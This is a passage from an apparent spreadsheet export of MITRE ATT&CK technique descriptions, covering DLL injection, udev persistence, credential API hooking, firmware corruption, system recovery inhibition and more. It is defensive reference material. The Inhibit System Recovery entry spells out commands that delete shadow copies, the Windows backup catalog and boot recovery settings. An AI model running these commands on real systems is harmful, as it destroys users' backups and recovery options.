System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing &lt;code&gt;net time \\hostname&lt;/code&gt; to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using &lt;code&gt;w32tm /tz&lt;/code&gt;.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as &lt;code&gt;GetTickCount()&lt;/code&gt; to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)
In addition, system calls – such as &lt;code&gt;time()&lt;/code&gt; – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as &lt;code&gt;systemsetup -gettimezone&lt;/code&gt; or &lt;code&gt;timeIntervalSinceNow&lt;/code&gt; to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
https://attack.mitre.org/techniques/T1124</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>At</t>
  </si>
  <si>
    <t>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the &lt;code&gt;at.allow&lt;/code&gt; file. If the &lt;code&gt;at.allow&lt;/code&gt; file does not exist, the &lt;code&gt;at.deny&lt;/code&gt; file is checked. Every username not listed in &lt;code&gt;at.deny&lt;/code&gt; is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the &lt;code&gt;at.deny&lt;/code&gt; exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via &lt;code&gt;sudo&lt;/code&gt;.(Citation: GTFObins at)
https://attack.mitre.org/techniques/T1053/002</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  
DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; (which calls the &lt;code&gt;LoadLibrary&lt;/code&gt; API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) 
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of &lt;code&gt;LoadLibrary&lt;/code&gt;).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) 
Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's &lt;code&gt;AddressOfEntryPoint&lt;/code&gt; before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/001</t>
  </si>
  <si>
    <t>T1588.005</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.
Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
https://attack.mitre.org/techniques/T1588/005</t>
  </si>
  <si>
    <t>T1556</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.
https://attack.mitre.org/techniques/T1556</t>
  </si>
  <si>
    <t>T1546.017</t>
  </si>
  <si>
    <t>Udev Rules</t>
  </si>
  <si>
    <t>Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
https://attack.mitre.org/techniques/T1546/017</t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
https://attack.mitre.org/techniques/T1056/004</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.
In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485).
https://attack.mitre.org/techniques/T1495</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* &lt;code&gt;vssadmin.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - &lt;code&gt;wmic shadowcopy delete&lt;/code&gt;
* &lt;code&gt;wbadmin.exe&lt;/code&gt; can be used to delete the Windows Backup Catalog - &lt;code&gt;wbadmin.exe delete catalog -quiet&lt;/code&gt;
* &lt;code&gt;bcdedit.exe&lt;/code&gt; can be used to disable automatic Windows recovery features by modifying boot configuration data - &lt;code&gt;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no&lt;/code&gt;
* &lt;code&gt;REAgentC.exe&lt;/code&gt; can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* &lt;code&gt;diskshadow.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;diskshadow delete shadows all&lt;/code&gt; (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
https://attack.mitre.org/techniques/T1490</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
https://attack.mitre.org/techniques/T1546/007</t>
  </si>
  <si>
    <t>T1566.003</t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. 
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: Lookout Dark Caracal Jan 2018) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.
https://attack.mitre.org/techniques/T1566/003</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.
https://attack.mitre.org/techniques/T1090/001</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>System Script Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)
https://attack.mitre.org/techniques/T1216</t>
  </si>
  <si>
    <t>T1102.001</t>
  </si>
  <si>
    <t>Dead Drop Resolver</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
https://attack.mitre.org/techniques/T1102/001</t>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Junk Data</t>
  </si>
  <si>
    <t>Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.
https://attack.mitre.org/techniques/T1001/001</t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>Spearphishing Service</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
https://attack.mitre.org/techniques/T1598/001</t>
  </si>
  <si>
    <t>T1552.007</t>
  </si>
  <si>
    <t>Container API</t>
  </si>
  <si>
    <t>Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)
An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.
https://attack.mitre.org/techniques/T1552/007</t>
  </si>
  <si>
    <t>T1584.001</t>
  </si>
  <si>
    <t>Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)
https://attack.mitre.org/techniques/T1584/001</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).
Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) 
Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR)
https://attack.mitre.org/techniques/T1505/001</t>
  </si>
  <si>
    <t>T1556.004</t>
  </si>
  <si>
    <t>Network Device Authentication</t>
  </si>
  <si>
    <t>Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)
https://attack.mitre.org/techniques/T1556/004</t>
  </si>
  <si>
    <t>T1561.001</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
https://attack.mitre.org/techniques/T1561/001</t>
  </si>
  <si>
    <t>T1213.005</t>
  </si>
  <si>
    <t>Messaging Applications</t>
  </si>
  <si>
    <t>Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.  
The following is a brief list of example information that may hold potential value to an adversary and may also be found on messaging applications: 
* Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008)) 
* Source code snippets 
* Links to network shares and other internal resources 
* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)
* Discussions about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker 2021)(Citation: Microsoft DEV-0537)
In addition to exfiltrating data from messaging applications, adversaries may leverage data from chat messages in order to improve their targeting - for example, by learning more about an environment or evading ongoing incident response efforts.(Citation: Sentinel Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)
https://attack.mitre.org/techniques/T1213/005</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.
https://attack.mitre.org/techniques/T1048/003</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with &lt;code&gt;@rpath&lt;/code&gt;, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt; function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)
https://attack.mitre.org/techniques/T1574/004</t>
  </si>
  <si>
    <t>T1601.002</t>
  </si>
  <si>
    <t>Downgrade System Image</t>
  </si>
  <si>
    <t>Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)
On embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.
Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).
https://attack.mitre.org/techniques/T1601/002</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.
https://attack.mitre.org/techniques/T1078/003</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.
Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.
There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)
https://attack.mitre.org/techniques/T1211</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.
https://attack.mitre.org/techniques/T1127</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
